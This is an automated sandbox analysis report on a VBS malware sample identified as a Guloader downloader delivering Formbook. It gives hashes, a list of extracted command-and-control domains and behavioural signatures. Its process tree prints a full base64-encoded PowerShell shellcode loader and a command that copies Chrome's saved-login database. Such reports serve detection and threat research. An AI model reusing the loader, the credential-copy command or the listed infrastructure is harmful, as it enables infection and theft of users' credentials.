Analysis
-
max time kernel
148s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
09-02-2022 14:58
Static task
static1
Behavioral task
behavioral1
Sample
file673736 241-22 01.02.22.vbs
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
file673736 241-22 01.02.22.vbs
Resource
win10v2004-en-20220113
General
-
Target
file673736 241-22 01.02.22.vbs
-
Size
165KB
-
MD5
7faf86b2e1bb45a26367227c777dc668
-
SHA1
74e41c42eb5b04c532567d9244c969f4895ee3ca
-
SHA256
e76b1a4f9aa3787900758ce81367f40587ca3d6a3a7ab6d1d02537e12cb10c37
-
SHA512
c9427897cb391da11ee8325cd0ffd8efc7b94b2c46503a1cc4a71bd8497fcdfa42efccba7613b1119329d26b510486fe1c05290726ce06c53b60b1c76ded6427
Malware Config
Extracted
formbook
4.1
k6sm
mingshengjewelry.com
ontimecleaningenterprise.com
alyssa0.xyz
ptecex.xyz
dukfot.online
pvcpc.com
iowalawtechnology.com
nestletranspotation.com
mysithomes.com
greenlakespaseattle.com
evofishingsystems.com
unilytcs.com
ordemt.com
dentalbatonrouge.com
pictureme360.net
chalinaslacatalana.com
newmirrorimage.xyz
pinklaceandlemonade.com
rapinantes.com
yzicpa.com
josephosman.com
robsarra.com
shumgroup.net
flooringnewhampshire.com
onceadayman.com
audiomacklaunch.xyz
hurryburry.com
golfvid.info
tutortenbobemail.com
tatlitelasorganizasyon.com
tqgtdd.space
classicalruns.com
xx3tgnf.xyz
galwayartanddesign.com
qidu.press
crypto-obmennik.com
dn360rn001.com
tridim.tech
phamhome.com
mediadollskill.com
loveatmetaverse.com
electric4x4parts.com
azulymargarita.com
isadoramel.com
rubyclean.com
officiallydanellewright.com
wu8d349s67op.xyz
detetivepyther.com
wondubniumgy463.xyz
registry-finance3.com
ultracoding.com
open-4business.com
supremelt.online
pangfeng.xyz
morneview.com
northfloridapsychic.com
kg4bppuh.xyz
friv.asia
epsilonhomecare.com
hbina.com
beachhutprinting.com
sophoscloudoptix.net
managemarksol.site
palestyna24.info
usyeslogistics.com
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Formbook Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/4648-159-0x0000000000400000-0x00000000006A3000-memory.dmp formbook behavioral2/memory/4648-160-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral2/memory/4452-166-0x0000000000EC0000-0x0000000000EEF000-memory.dmp formbook -
Adds policy Run key to start application 2 TTPs 2 IoCs
Processes:
colorcpl.exedescription ioc process Key created \Registry\User\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run colorcpl.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VFSHNFNPIRY = "C:\\Program Files (x86)\\internet explorer\\ieinstal.exe" colorcpl.exe -
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
Processes:
powershell.exeieinstal.exedescription ioc process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ieinstal.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation WScript.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
colorcpl.exedescription ioc process Key created \Registry\User\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run colorcpl.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
ieinstal.exepid process 4648 ieinstal.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exeieinstal.exepid process 4248 powershell.exe 4648 ieinstal.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exeieinstal.execolorcpl.exedescription pid process target process PID 4248 set thread context of 4648 4248 powershell.exe ieinstal.exe PID 4648 set thread context of 3024 4648 ieinstal.exe Explorer.EXE PID 4452 set thread context of 3024 4452 colorcpl.exe Explorer.EXE -
Drops file in Windows directory 8 IoCs
Processes:
svchost.exeTiWorker.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File opened for modification C:\Windows\WinSxS\pending.xml TiWorker.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
colorcpl.exedescription ioc process Key created \Registry\User\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 colorcpl.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
powershell.exeieinstal.execolorcpl.exepid process 4248 powershell.exe 4248 powershell.exe 4648 ieinstal.exe 4648 ieinstal.exe 4648 ieinstal.exe 4648 ieinstal.exe 4452 colorcpl.exe 4452 colorcpl.exe 4452 colorcpl.exe 4452 colorcpl.exe 4452 colorcpl.exe 4452 colorcpl.exe 4452 colorcpl.exe 4452 colorcpl.exe 4452 colorcpl.exe 4452 colorcpl.exe -
Suspicious behavior: MapViewOfSection 9 IoCs
Processes:
powershell.exeieinstal.execolorcpl.exepid process 4248 powershell.exe 4248 powershell.exe 4648 ieinstal.exe 4648 ieinstal.exe 4648 ieinstal.exe 4452 colorcpl.exe 4452 colorcpl.exe 4452 colorcpl.exe 4452 colorcpl.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exesvchost.exeTiWorker.exedescription pid process Token: SeDebugPrivilege 4248 powershell.exe Token: SeShutdownPrivilege 2272 svchost.exe Token: SeCreatePagefilePrivilege 2272 svchost.exe Token: SeShutdownPrivilege 2272 svchost.exe Token: SeCreatePagefilePrivilege 2272 svchost.exe Token: SeShutdownPrivilege 2272 svchost.exe Token: SeCreatePagefilePrivilege 2272 svchost.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe Token: SeBackupPrivilege 1280 TiWorker.exe Token: SeRestorePrivilege 1280 TiWorker.exe Token: SeSecurityPrivilege 1280 TiWorker.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
WScript.exepowershell.execsc.exeExplorer.EXEcolorcpl.exedescription pid process target process PID 4088 wrote to memory of 4248 4088 WScript.exe powershell.exe PID 4088 wrote to memory of 4248 4088 WScript.exe powershell.exe PID 4088 wrote to memory of 4248 4088 WScript.exe powershell.exe PID 4248 wrote to memory of 3460 4248 powershell.exe csc.exe PID 4248 wrote to memory of 3460 4248 powershell.exe csc.exe PID 4248 wrote to memory of 3460 4248 powershell.exe csc.exe PID 3460 wrote to memory of 504 3460 csc.exe cvtres.exe PID 3460 wrote to memory of 504 3460 csc.exe cvtres.exe PID 3460 wrote to memory of 504 3460 csc.exe cvtres.exe PID 4248 wrote to memory of 1300 4248 powershell.exe ieinstal.exe PID 4248 wrote to memory of 1300 4248 powershell.exe ieinstal.exe PID 4248 wrote to memory of 1300 4248 powershell.exe ieinstal.exe PID 4248 wrote to memory of 4648 4248 powershell.exe ieinstal.exe PID 4248 wrote to memory of 4648 4248 powershell.exe ieinstal.exe PID 4248 wrote to memory of 4648 4248 powershell.exe ieinstal.exe PID 4248 wrote to memory of 4648 4248 powershell.exe ieinstal.exe PID 3024 wrote to memory of 4452 3024 Explorer.EXE colorcpl.exe PID 3024 wrote to memory of 4452 3024 Explorer.EXE colorcpl.exe PID 3024 wrote to memory of 4452 3024 Explorer.EXE colorcpl.exe PID 4452 wrote to memory of 1988 4452 colorcpl.exe cmd.exe PID 4452 wrote to memory of 1988 4452 colorcpl.exe cmd.exe PID 4452 wrote to memory of 1988 4452 colorcpl.exe cmd.exe PID 4452 wrote to memory of 4512 4452 colorcpl.exe Firefox.exe PID 4452 wrote to memory of 4512 4452 colorcpl.exe Firefox.exe PID 4452 wrote to memory of 4512 4452 colorcpl.exe Firefox.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file673736 241-22 01.02.22.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBIAGoAbABwADIAIABvAHIAZABpAG4AcgBzAGsAbgAgAEsATwBOAFYAIABEAEkAUwBDAEkAIABwAHIAZQBkAGUAdABlAHMAIABUAGUAZwBuAG0AcwAgAGQAZQBpAG4AYwByACAAQgBSAE8AQQBEAEUATgBJAE4ARwAgAEMAQQBQAEUAUgBOAE8AIABGAHIAYQBnAG0AZQA3ACAAUwBrAG0AbQAgAEYAbwByAGIAZQBoAG8AIABIAEEATABTAEgAVgAgAEoAaQBiAGUAZABzAHcAIABiAGUAZgBhAG0AbABpACAAVQBOAEMASABSAEkAUwAgAFIAbwBzAGsAaQBsAGQAZQBuAHMAOQAgAGEAdgBsAHMAIAB1AGQAcgBlAGQAIABSAEUAUABSAEUASABFACAAWQBtAHAAbgBpAG4AIABkAHUAcwB0AHMAaABlAGUAIABQAGEAcgBvACAARQBsAGUAYQAgAFUAbgBkAGUAcgA5ACAATQBvAHQAaQB2AGUAdAAzACAAdABhAGsAdABlAHIAaQBuACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAFUAUABFAFIAUABSAEUARABJADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABTAFUAUABFAFIAUABSAEUARABJADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAGQAaQBzAGIAcgBhACwAaQBuAHQAIABPAGwAZAB0AGkALAByAGUAZgAgAEkAbgB0ADMAMgAgAFMAVQBQAEUAUgBQAFIARQBEAEkALABpAG4AdAAgAFAAcgBlAGMAdQByAHIAaQBjAHUALABpAG4AdAAgAFMAVQBQAEUAUgBQAFIARQBEAEkANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABWAGkAbABkAGgAZQBkAG8AbgB5ACwAdQBpAG4AdAAgAFMAUABFAFIATQBJAEUAVABGAEUALABpAG4AdAAgAFAAQQBSAEEAVAAsAGkAbgB0ACAAUwBVAFAARQBSAFAAUgBFAEQASQAwACwAaQBuAHQAIABFAHYAbwBrAGUAcgBzAGsALABpAG4AdAAgAEEARQBDAEkATwAsAGkAbgB0ACAAUwBzAHQAdABlAG4AZAAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAE8AbABkAHQAaQAwACwAdQBpAG4AdAAgAE8AbABkAHQAaQAxACwASQBuAHQAUAB0AHIAIABPAGwAZAB0AGkAMgAsAHIAZQBmACAASQBuAHQAMwAyACAATwBsAGQAdABpADMALABpAG4AdAAgAE8AbABkAHQAaQA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBBACgASQBuAHQAUAB0AHIAIABPAGwAZAB0AGkANQAsAGkAbgB0ACAATwBsAGQAdABpADYALABpAG4AdAAgAE8AbABkAHQAaQA3ACwAaQBuAHQAIABPAGwAZAB0AGkAOAAsAGkAbgB0ACAATwBsAGQAdABpADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAbwBsAGkAdgBhAGMAZQAgAFMAawBvAHIAcABlAHMAIABEAHcAYQByAGYAIABGAGwAeQB2ADYAIABQAGwAZQB0AGYAcgBpAGUAMwAgAGEAawB2AGEAdABpAG4AIABiAG8AYQByACAAQgBvAG0AYgBlAHIAZQAgAEEAYgB1AG0AYgAyACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBtAGQAaQBnAG8AbwBnAGUAbgB5ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFIAZQBrAHUAcgBzAGkAbwBuAHMAIgAgAA0ACgAkAFMAVQBQAEUAUgBQAFIARQBEAEkAMwA9ADAAOwANAAoAJABTAFUAUABFAFIAUABSAEUARABJADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAUwBVAFAARQBSAFAAUgBFAEQASQA4AD0AWwBTAFUAUABFAFIAUABSAEUARABJADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgALQAxACwAWwByAGUAZgBdACQAUwBVAFAARQBSAFAAUgBFAEQASQAzACwAMAAsAFsAcgBlAGYAXQAkAFMAVQBQAEUAUgBQAFIARQBEAEkAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAEcAdQBtAG0AMwAgAEEAbgB0AGkANgAgAGgAdgBlAHAAcwBlAG4AZQBzAGkAIAByAGUAYwBlAHAAdAAgAFAAcgBvAHQAZQBzAHQAMwAgAGEAcABwAG8AaQBuAHQAcwBsACAARABFAEwAUABMACAASABBAFYAQQBBAEwAUAAgAHIAdQBiAGkAYwAgAHIAaQBuAGcAZQBsACAATwB2AGUAcgBsAG8AZwBpAGMAYQA0ACAAZgBhAHIAbABpACAATgBhAHIAcgBlAHIAaQA3ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBDAGgAZQB0AGkAdgBlAHUAbgA3ACIAIAANAAoAJABTAFUAUABFAFIAUABSAEUARABJADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEEAawB0AGkAdgBzAGcAZQBtAC4AZABhAHQAIgANAAoAIwBUAGkAcwBzAGUAdAAgAEkAYgBsAGEAbgAgAFMAYQBsAHYAIABFAG4AYwBlACAAUwBwAGUAagBsAGsAYQBiAGkAIABTAGoAdQBzAHMANgAgAE8ATQBTAFQATgBJAE4ARwBTAEEAIABuAG8AbgBhAHMAYwBlAHQAaQBjACAATgBPAE4AUAAgAFMAdABpAG4AMwAgAA0ACgAkAFMAVQBQAEUAUgBQAFIARQBEAEkANAA9AFsAUwBVAFAARQBSAFAAUgBFAEQASQAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQAUwBVAFAARQBSAFAAUgBFAEQASQAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAE0AaQBzAG0AbwB2ACAARgBvAHIAcwByADUAIABMAGUAZwBpAHQAaQAgAEsAQQBUAEgATABJAE4AUwAgAFAAUgBPAEIATwBTAEMARQBTACAAUAByAG0AaQBlAG8AYgBsAGkAIABoAHIAZQBuAGQAZQBiACAAZgBhAGcAZwByAHUAcABwAGUAIABGAGkAeABpAHQAaABlAG4AZAAgAGEAbAB5AGMAbwAgAE4AbwBuAGQAIABTAGEAZABsAGUAcgBmAGEAdQBuACAAVABhAGsAdAByAGUAZwB1AGwAIABFAEQARwBFAE0AQQBOAEwAIABuAG8AbgBwACAAbQBlAHQAZQBvAHIAbwBsACAAUgBhAGIAYgBpAHQANwAgAFMATwBUAFQASQAgAEEAcgBnAHUAcwBqAGUAdABoADUAIABHAGEAcgBkAGUAcgA3ACAAUABsAGEAYwBpAGQAZwB1ADgAIABDAGgAYQBnAHIAaQBuAG4AZQA1ACAAVQBOAFcATwAgAHIAbgB0AGcAZQBuAGIAbABpAGsAIABmAGwAbwByAGkAcwAgAEIAaQBmAGkAZwA0ACAASABZAEcAUgBPACAATgBvAGcAZwBpAG4AZwBzADMAIABIAEkATABTAEUATgAgAFcAQQBTAEgAVABVACAAUAByAG8AdABvAGMAaQB0AGkAegAgAE8AdgBlAHIAcQAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATgBJAFQAUgAiACAADQAKACQAUwBVAFAARQBSAFAAUgBFAEQASQA1AD0AMAA7AA0ACgAjAGQAZQBjAGEAeQBlAGQAIABDAGEAcgB0AG0AYQBuAHUAbgBkADQAIABLAFUAUwBPAE4AIABzAHUAYwBjAGUAcwAgAGYAbwByAHYAYQBuACAAVgBpAHIAdAB1AG8AMgAgAFIAZQBkAGkAZwBlAHIAaQBuAGcAIABEAEUATABJAEsAQQBUAEUAIABVAG4AYwBvAGcAbgBpAHoAYQBuACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAEEAUgBUAE8AVABFAEsAUwAiACAADQAKAFsAUwBVAFAARQBSAFAAUgBFAEQASQAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQAUwBVAFAARQBSAFAAUgBFAEQASQA0ACwAJABTAFUAUABFAFIAUABSAEUARABJADMALAA2ADYANQA3ADIALABbAHIAZQBmAF0AJABTAFUAUABFAFIAUABSAEUARABJADUALAAwACkADQAKACMATQBnAGwAZQByADUAIABTAFQASQBMAEEAIABzAGsAbgBkAGkAZwBoACAARgBsAHMAdQBiAGUAcQB1AGEAdAA0ACAAZQBzAHAAcgBlAHMAcwBpAHYAIABQAHIAbwBnAHIAYQBtAG0AZQAgAE4AbwBuAGYAOAAgAFAAUgBJAE4AQwBJAFAAIABCAGUAcgBuAHMAZwAgAGsAcgBhAHMAcwBlAHMAbwBjAGMAIABiAGEAZABnAGUAcgBpACAAUgBlAGoAcwBlAG4AZABlAHkAIAByAGUAcwB0AGEAZwBlAHIAIABzAGEAbQBzAGUAbgBkAGkAbgBnACAAQgByAHUAZwA1ACAAUABhAHAAaQByACAAUwBPAEMASQAgAEEAZABnAGEAbgBnAHMAZgBvAHIAIABLAHIAYQB0AG8AZwBlAG4AaQAxACAAawBpAG4AawAgAEsAVgBJAEsAUwAgAEsAUgBWAEUAUwBLAEUATABUAEkAIABTAGsAcgB2AGUAYgBhAG4AZQByACAARQBuAHQAcgBlAHAAcgAgAFAAbABhAG4AZQB0ADMAIABTAEwAQQBUACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAE8ATgBGAEkAUwBLACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEQARABDAEEARABFAE4ATwBDAEEAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAQQBuAHIAZQB0AHQAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBNAEEATABKAEUAUgBJACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYAZQB0AGkAcwA1ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEwAdQBkAGUAcgBrAGEAcgBsACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEEAcwBjAGUAbAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBOAGUAYwBlAHMAcwBpADUAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAYgB1AHIAZwBhAG0AbwB0AGEAbQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBnAHIAbwB1AHMAZQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBOAGEAdAB1AHIAawByAGEAZgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBDAEEAUgBGAEEAUgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAEkARQBTAEgATwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBSAEEATQBTAEwARwBEAFIAIgAgAA0ACgBbAFMAVQBQAEUAUgBQAFIARQBEAEkAMQBdADoAOgBDAGEAbABsAFcAaQBuAGQAbwB3AFAAcgBvAGMAQQAoACQAUwBVAFAARQBSAFAAUgBFAEQASQAzACwAIAAwACwAMAAsADAALAAwACkADQAKAA0ACgA="2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\avb3dpw4\avb3dpw4.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE01C.tmp" "c:\Users\Admin\AppData\Local\Temp\avb3dpw4\CSC3FE647F9E3A84EA4A4E5469C4CDF1E48.TMP"4⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"3⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"3⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\colorcpl.exe"C:\Windows\SysWOW64\colorcpl.exe"2⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V3⤵
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Aktivsgem.datMD5
b8fb4faef24302dcfac6cc1a885b1ec2
SHA19c14c95107f054c0bfc77243cb99aa57fe3f9bd1
SHA2569ba5694976d1254b451bc1be9495049fba0421e65d1ccf23fb2c39a2d4f531f0
SHA512e0506ecdb5fcfcb32e0f32167c30a7daa03e572eb514db96661709751c161f85f265a6f98ce2c2e03aa2cf1a80dbcba489614e7923aa2f7e7fc629b068ef41d7
-
C:\Users\Admin\AppData\Local\Temp\DB1MD5
b608d407fc15adea97c26936bc6f03f6
SHA1953e7420801c76393902c0d6bb56148947e41571
SHA256b281ce54125d4250a80f48fcc02a8eea53f2c35c3b726e2512c3d493da0013bf
SHA512cc96ddf4bf90d6aaa9d86803cb2aa30cd8e9b295aee1bd5544b88aeab63dc60bb1d4641e846c9771bab51aabbfbcd984c6d3ee83b96f5b65d09c0841d464b9e4
-
C:\Users\Admin\AppData\Local\Temp\RESE01C.tmpMD5
a3ecd28106cca394cba7579fc9e84b57
SHA12c9c5708b24b828e76185dacb549b5f0c4d41efd
SHA256da5ff9f640f9485e28acf160f4d1d849037b1546a3ae4be31799893d21a01a7f
SHA51279dd9860fda9e92306d83d9a2d9dd56b41f1cb6fa75e080b5409025a41c87c5a6199e7cf3ed029dc03d63448453aa2ef2c6059af29fa5cfcd833171e04262cf7
-
C:\Users\Admin\AppData\Local\Temp\avb3dpw4\avb3dpw4.dllMD5
71cd14449e53eb22c5c76e6aa7ade0b6
SHA1ecfbd9f40a06334aa79b7bf8c67cd0647910967c
SHA256ace9ff29f24190093742234c8871955bee2864b39729ed0b7d3dc397567d7f89
SHA51200a471d42c9c7675f0a140ef12486525d2ac161724151ac39db80709eab37c35de69aedd67a673d49cf05421260b3f596891c67e0256520dff4df85a86676c30
-
\??\c:\Users\Admin\AppData\Local\Temp\avb3dpw4\CSC3FE647F9E3A84EA4A4E5469C4CDF1E48.TMPMD5
2e53da9eedde3a261a6e07d633598a3e
SHA18cffb57d8682c5e605e795950c54b4906b46d6f4
SHA256c637c0a28a7c456ce36dcc526ff1c9cf9aac1ba0f7d8983bcce13d5002ca4631
SHA5123619e4521ff09860b045410dffd144aad43cccc15c532d9b675114db0a7c4e6e22fab744899ed46f430367f9c484b25460d73875cc106afc564afca7bd243383
-
